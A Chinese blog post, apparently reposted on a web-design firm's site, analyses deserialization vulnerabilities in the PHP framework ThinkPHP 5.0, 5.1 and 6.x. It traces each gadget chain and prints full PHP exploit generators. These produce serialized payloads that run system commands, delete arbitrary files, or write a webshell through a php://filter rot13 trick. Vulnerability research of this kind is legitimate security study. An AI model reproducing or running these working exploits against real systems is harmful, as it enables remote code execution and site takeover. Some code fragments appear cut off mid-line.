十年网站开发经验 + 多家企业客户 + 靠谱的建站团队
量身定制 + 运营维护+专业推广+无忧售后,网站问题一站解决
这篇文章给大家介绍Thinkphp5.0、5.1、6.x反序列化的漏洞分析,内容非常详细,感兴趣的小伙伴们可以参考借鉴,希望对大家能有所帮助。
企业建站必须是能够以充分展现企业形象为主要目的,是企业文化与产品对外扩展宣传的重要窗口,一个合格的网站不仅仅能为公司带来巨大的互联网上的收集和信息发布平台,创新互联建站面向各种领域:水电改造等网站设计、成都全网营销推广解决方案、网站设计等建站排名服务。
命名空间的声明可避免类或函数名重复导致的各种问题。使用namespace可以声明、切换命名空间。
/*运行结果 *当前命名空间first *当前命名空间second */
在不同命名空间内可以定义同名类,有多个命名空间时,默认为最后一次声明的空间.若要使用其他命名空间的类,则需要在类前加入命名空间,直接使用其他命名空间的类会出错
Thinkphp v5.1.39LTS
POP链为:Windows::__destruct --> Pivot::__toString --> Request::__call -->Request::isAjax --> Request::param --> Request::input --> Request::filterValue -->call_user_func
,
Windows类thinkphp/library/think/process/pipes/Windows.php
跟踪removeFiles()
该函数功能,遍历Windows->files属性,若存在该属性指定的文件,则删除。$this->files完全可控,故可删除任意文件,例如
files = ["D://del.txt"]; } } echo urlencode(serialize(New Windows()))."\n"; ?> //运行结果 //O%3A27%3A%22think%5Cprocess%5Cpipes%5CWindows%22%3A1%3A%7Bs%3A34%3A%22%00think%5Cprocess%5Cpipes%5CWindows%00files%22%3Ba%3A1%3A%7Bi%3A0%3Bs%3A11%3A%22D%3A%2F%2Fdel.txt%22%3B%7D%7D
removeFiles函数第163行,以file_exist函数处理$filename
,file_exist函数会将参数当作字符串处理,倘若使得$filename为一个拥有__toString方法的对象则可触发__toString方法。
Pivot类的__toString方法来自父类Model,而Model的__toString方法则来自trait类Conversion
Conversion类__toString链如下
toArray代码过长,截取有用部分如下
其间$relation变量来自$this->data[$name],而$name变量则来自$this->append,此两者皆可控。若使得$relation为拥有可利用visible方法或者不拥有visible方法但拥有可利用__call方法的对象,则可进入下一步利用。
__call这里找到Request类,如下
由于$this->hook可控,我们可以轻易执行到call_user_func_array.但又由于代码330行array_unshift的存在,使得Request对象被放置到$args的首位,导致我们无法在此处执行任意代码(因为参数不可控),故需要再次寻找第一个参数不太影响结果的函数构造可利用链。
这里找到Request::isAjax,并跟踪
跟踪input
$name来自config['var_ajax'],可控,$data来自$this->param,也可控.
跟踪filterValue,其间执行了call_user_func($filter, $value)
$value来自input中的$data,故最终来自$this->param,$filter在调用getFilter函数后获得
其间$this->filter可控,故$filter可控。由于$filter,$value皆可控,故可执行任意代码,再回看一次pop链
Windows::__destruct --> Pivot::__toString --> Request::__call -->Request::isAjax --> Request::param --> Request::input --> Request::filterValue -->call_user_func
倘若要执行system('id'),则需要控制变量为以下值
Request->filter = "system"; Request->param = array('id'); Request->hook['visible'] = [$this,"isAjax"]; Request->config['var_ajax'] = ''; Pivot->data = ["azhe" => new Request()]; Pivot->append = ["azhe" => ["4ut","15m"]]; Windows->files = [new Pivot()]; ---exp--- data = ["azhe" => new Request()]; $this->append = ["azhe" => ["4ut","15m"]]; } } class Request{ protected $config = [ // 表单请求类型伪装变量 'var_method' => '_method', // 表单ajax伪装变量 'var_ajax' => '_ajax', // 表单pjax伪装变量 'var_pjax' => '_pjax', // PATHINFO变量名 用于兼容模式 'var_pathinfo' => 's', // 兼容PATH_INFO获取 'pathinfo_fetch' => ['ORIG_PATH_INFO', 'REDIRECT_PATH_INFO', 'REDIRECT_URL'], // 默认全局过滤方法 用逗号分隔多个 'default_filter' => '', // 域名根,如thinkphp.cn 'url_domain_root' => '', // HTTPS代理标识 'https_agent_name' => '', // IP代理获取标识 'http_agent_ip' => 'HTTP_X_REAL_IP', // URL伪静态后缀 'url_html_suffix' => 'html', ]; protected $param = []; protected $hook = []; protected $filter; public function __construct(){ $this->filter = "system"; $this->hook = ["visible" => [$this, "isAjax"]]; $this->param = array('id'); //可以在这里写定命令,也可不在此设定,param函数会通过提交的参数来更新该值,故也可直接在地址栏提交任意参数执行命令 $this->config['var_ajax'] = ''; } } namespace think\process\pipes; use think\Model\Pivot; class Windows{ private $files ; public function __construct(){ $this->files = [new Pivot()]; } } namespace think\model; use think\Model; class Pivot extends Model{ } use think\process\pipes\Windows; echo urlencode(serialize(new Windows()))."\n"; ?>
POP链Model->__destruct() --> Model->save() --> Model->updateData() --> Model->checkAllowFields() --> Conversion->__toString() --> Conversion->toJson() --> Conversion->toArray() --> Attribute->getAttr() --> Attribute->getValue()
先看反序列化起点Model->__destruct()
当$this->lazySave == true
时调用save,跟踪如下
要想调用updateData,需要绕过第一个if并且$this->exists == true
if的绕过需要使isEmpty()返回false并且trigger()返回true
跟踪isEmpty(),当$this->data
不为空时返回false
跟踪trigger(),当$this->withEvent == false
时trigger()返回true.(PS:trigger()所属类为ModelEvent)
绕过后,跟踪updateData().
要想调用checkAllowFields需要绕过第二个if.跟踪getChangedData()查看$data
的获取
当$this->force == true
时,$data
可控并且就为$this->data
的值
跟踪checkAllowFields().这里已经可以看到一个__toString
触发点,除了这一个触发点,还有一个触发点就是db()
跟踪db().进行字符串拼接处即是触发点。只要使$this->table、$this->name或$this->suffix
为拥有__toString
方法的对象即可。
要想执行到触发点,需要绕过updateData的第2个和第3个if,也即是$this->field(默认为空)与$this->schema(默认为空)
为空
以上即是__destruct
链,总结一下需要设置的属性如下
Model->lazySave = true; Model->exists = true; Model->withEvent = false Model->force = true; Model->data不为空 Model->name(或table、suffix)为某对象
下面看__toString
链
Conversion->__toString
跟踪toArray()
要调用getAttr()首先需要绕过if.
$data
来自$this->data
和$this->relation
,当$data
的value
不是Model或ModelCollection实例时即可通过第一个if,若设置$this->visible
则在173行调用getAttr,不设置则在175行调用,没有影响.
跟进getAttr()
调用getData获取到$value
,跟进
跟进getRealFieldName()
当$this->strict == true(默认也为true)
时,返回$name
(name即是$this->data
的key).也即是$fieldName
终值为$this->data
的key.
代码279行的if,当$this->data
中存在$fieldName
键时,返回对应键的值。故$value
最终值为$this->data[$fieldName]
跟进getValue()
代码第496行,$closure完全可控,第497行触发rce.
先看调用getValue()传入的参数,$name、$value、$relation
,这三者分别为$this->data的key,$this->data的value,false
因为$this->withAttr[$fieldName]
可控并且$relation == false
,故程序会执行到497行。
以上则为__toString
链,总结需要设置的内容如下
$this->data = array('azhe'=>'whoami'); $this->withAttr = array('azhe'=>[]) Conversion类为trait类,需要寻找使用了它的类,这里可以用Pivot类 上下文总结如下 $Model->lasySave = true; $Model->exists = true; $Model->withEvent = false; $Model->force = true; $Model->name = new Pivot(); $Model->data = array('azhe'=>'whoami'); $Model->withAttr = array('azhe'=>'system');
__destruct() *Model->save() *Model->updateData() *Model->checkAllowFields() *Conversion->__toString() *Conversion->toJson() *Conversion->toArray() *Conversion->getAttr() *Conversion->getValue() */ namespace think; abstract class Model{ private $exists; private $force; private $lazySave; protected $name; protected $withEvent; private $data; private $withAttr; public function __construct($obj = null,$cmd = ''){ $this->lazySave = true; $this->exists = true; $this->withEvent = false; $this->force = true; $this->name = $obj; $this->data = array('azhe'=>"${cmd}"); $this->withAttr = array('azhe'=>'system'); } } namespace think\model; use think\Model; class Pivot extends Model{ } $a = new Pivot(); $b = new Pivot($a,$argv[1]); echo urlencode(serialize($b))."\n"; ?>
POP链Windows->__destruct() --> Windows->removeFiles() --> Model->__toString --> Model->toJson() --> Model->toArray() --> Output->__call --> Output->block --> Output->writeln --> Output->write --> Memcache->write --> File->set
首先看__destruct
链,thinkphp/library/think/process/pipes/Windows.php:56
跟进removeFiles(),这里与TPv5.1相同,也存在任意文件删除,不再演示
再看__toString
链,thinkphp/library/think/Model.php:2265
跟进toJson()
跟进toArray(),代码过多,截取关键部分
倘若$value
可控,则可在此处触发__call
因为$this->append
可控,所以$name
可控,当$name
不为数组,并且不含有.
时,代码进入899行,跟进Loader::parseName();
即$relation
可控为第一个字母小写的任意字符串
代码第900-901行,我们可以调用该类(Model)的任意方法,并且将结果赋予$modelRelation
先跟进getRelationData()
跟进isSelfRelation()
跟进getModel(),这个getModel是Relation的类方法
它的getModel又调用了$this->query
的getModel,因为$this->query
可控,故全局搜索getModel(),发现两个简单易用的getModel
这两个getModel都是直接返回对象的$this->model
,故$modelRelation->getModel()可控
可以发现,$this->parent
可控,倘若$modelRelation
也可控,那么$value
就可控。回看$modelRelation
,它为我们调用的、任一Model方法的返回值,查看Model类的方法,找到一简单可控的方法getError()
再往下看
$modelRelation
需要存在getBindAttr方法,全局搜索发现只有抽象类OneToOne存在该方法,并且该类也是Relation的子类。从这里看,我们需要让$modelRelation
为OneToOne的子类.再往下看,$bindAttr
可控
到这,已经可以随便控制$bindAttr
使代码执行到912行了。
912行,可以这样看
$item[$bindAttr的key] = $this->parent ? $this->parent->getAttr($bindAttr[key]) : null
,$bindAttr
与$this->parent
皆可控
OneToOne的子类如下,$modelRelation
可以任选其一
由于我们要使用Output类的__call方法,
故需要使$this->parent
为Output对象
__toString
链需要构造以下内容
Model->append = array('4ut15m'=>'getError'); Model->error = new BelongsTo(); //或者HasOne Model->parent = new Output(); OneToOne->selfRelation = false; OneToOne->query = new ModelNotFoundException(); OneToOne->bindAttr = array('4ut15m'); ModelNotFoundException->model = new Output();
再看__call
链,thinkphp/library/think/console/Output.php:208
代码212行,调用当前对象的block方法,跟进block()
跟进writeln()
$this->handle
可控,全局搜索write方法,找到 Memcache::write
其中$this->handler
、$this->config
都可控
全局搜索set方法,发现File::set
因为$this->options
可控,故$expire
可控,$name
和Memcache->config
相关,半可控,跟进getCacheKey()
至此$filename
路径可控,$name
为可以确定的md5值
写入文件的内容$data
由$value
和$expire
组成,追溯前者其不可控,值为true。后者则由于格式化输出的原因无法控制。跟进setTagItem()
代码在200行又调用了set方法,并且写入内容$value为传入的参数$name
也即是前文的$filename
,路径部分可控。这里可以通过php伪协议php://write
写入shell,如下
php://filter/write=string.rot13/resource=
__call
链需要构造以下内容
Output->styles = ['getAttr']; Output->handle = new Memcache(); Memcache->handler = new File(); File->options = ['expire' => 0, 'cache_subdir' => false, //设置为false可控制写入的文件在默认路径下 'prefix' => '', 'path' => 'php://filter/write=string.rot13/resource=', 'data_compress' => false];
files = array(new Pivot()); } } namespace think\model; use think\model\relation\BelongsTo; use think\console\Output; //Pivot类 class Pivot { public $parent; protected $error; protected $append; public function __construct(){ $this->append = array('4ut15m' => 'getError'); $this->error = new BelongsTo(); $this->parent = new Output(); } } namespace think\model\relation; use think\db\exception\ModelNotFoundException; //BelongsTo类 class BelongsTo { protected $parent; protected $query; protected $selfRelation; protected $bindAttr; public function __construct(){ $this->selfRelation = false; $this->query = new ModelNotFoundException(); $this->bindAttr = array('4ut15m'); } } namespace think\console; use think\session\driver\Memcache; //Output类 class Output{ private $handle; protected $styles; public function __construct(){ $this->styles = ['getAttr']; $this->handle = new Memcache(); } } namespace think\db\exception; use think\console\Output; //ModelNotFoundException类 class ModelNotFoundException{ protected $model ; public function __construct(){ $this->model = new Output(); } } namespace think\session\driver; use think\cache\driver\File; //Memcache类 class Memcache{ protected $handler; public function __construct(){ $this->handler = new File(); } } namespace think\cache\driver; use think\cache\Driver; //File类 class File { protected $tag; protected $options; public function __construct(){ $this->tag = '4ut15m'; $this->options = [ 'expire' => 0, 'cache_subdir' => false, 'prefix' => '', 'path' => 'php://filter/write=string.rot13/resource=', 'data_compress' => false, ]; } } use think\process\pipes\Windows; $windows = new Windows(); echo urlencode(serialize($windows))."\n"; ?>
关于Thinkphp5.0、5.1、6.x反序列化的漏洞分析就分享到这里了,希望以上内容可以对大家有一定的帮助,可以学到更多知识。如果觉得文章不错,可以把它分享出去让更多的人看到。